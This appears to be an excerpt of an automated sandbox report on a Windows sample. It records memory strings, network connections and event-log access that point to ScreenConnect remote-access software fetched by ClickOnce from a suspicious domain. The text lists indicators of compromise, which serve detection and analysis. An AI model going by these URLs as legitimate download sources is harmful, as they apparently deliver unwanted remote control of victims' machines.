Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3544000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A35EB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A38E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3908000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.or
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A32B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A32B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.cheloki
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotl
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Clie
Source: dfsvc.exe, 0000000E.00000002.2365394785.00000212BD6BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.ap
Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1948396561.000000001B42D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000011.00000002.1946552132.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application
Source: dfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A362E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#ScreenConnect.Wi
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A362E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#ScreenConnect.Wih
Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1946552132.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, C7EOHWRV.log.14.dr	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient
Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1948935379.000000001B484000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application089a7
Source: dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application1
Source: dfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application2
Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1948935379.000000001B484000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application8
Source: C7EOHWRV.log.14.dr, Unconfirmed 974768.crdownload.0.dr, chromecache_128.1.dr	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=cp3back
Source: dfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationK
Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1946552132.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationX
Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1948396561.000000001B42D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationZ
Source: dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationre=msila
Source: dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applications
Source: dfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationuLXGWokl
Source: dfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationw
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A362E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationx
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.dll
Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1946552132.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp, C7EOHWRV.log.14.dr	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.manifest
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientSe
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientService.dll
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientService.exe
Source: dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientService.exe_
Source: dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Core.dll
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Windows.dll
Source: dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Windows.dll63:
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstage
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.ex
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2366106744.00000212BEE92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.exe
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367830615.00000212BEF7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config
Source: dfsvc.exe, 0000000E.00000002.2367830615.00000212BEF7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configt
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A341C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exe
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2344956030.00000212A16DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exe.config
Source: dfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exe.config-U
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exx
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.e
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2359951085.00000212BB8EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe.config
Source: dfsvc.exe, 0000000E.00000002.2359951085.00000212BB8EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe.configg
Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManagp
Source: svchost.exe, 00000007.00000002.1367091647.0000024F94659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000007.00000002.1367177095.0000024F94681000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366547425.0000024F94641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367108889.0000024F94665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366519593.0000024F9465A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000007.00000002.1367177095.0000024F94681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000007.00000002.1367177095.0000024F94681000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000007.00000002.1367024630.0000024F9463F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367108889.0000024F94665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366519593.0000024F9465A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1366965576.0000024F94624000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000007.00000002.1367024630.0000024F9463F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367108889.0000024F94665000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000007.00000003.1366547425.0000024F94641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367042117.0000024F94644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000007.00000003.1366532997.0000024F94649000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000007.00000002.1367042117.0000024F94644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000007.00000003.1366547425.0000024F94641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000007.00000003.1366457343.0000024F9465D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1366965576.0000024F94624000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: ScreenConnect.Core.dll.14.dr	String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000004.00000003.1202956022.00000227BD062000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: svchost.exe, 00000007.00000003.1366577768.0000024F94630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak
Source: svchost.exe, 00000007.00000003.1366577768.0000024F94630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virt
Source: svchost.exe, 00000007.00000003.1366577768.0000024F94630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtuX
Source: svchost.exe, 00000007.00000003.1366547425.0000024F94641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000007.00000003.1366532997.0000024F94649000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000007.00000003.1366577768.0000024F94630000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366532997.0000024F94649000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367091647.0000024F94659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000007.00000002.1366965576.0000024F94624000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000007.00000003.1366577768.0000024F94630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.x
Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000007.00000002.1367091647.0000024F94659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.4.254:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.219.254:443 -> 192.168.2.16:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49743 version: TLS 1.2

Drops certificate files (DER)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42B	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141	Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security

Reads the System eventlog

Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
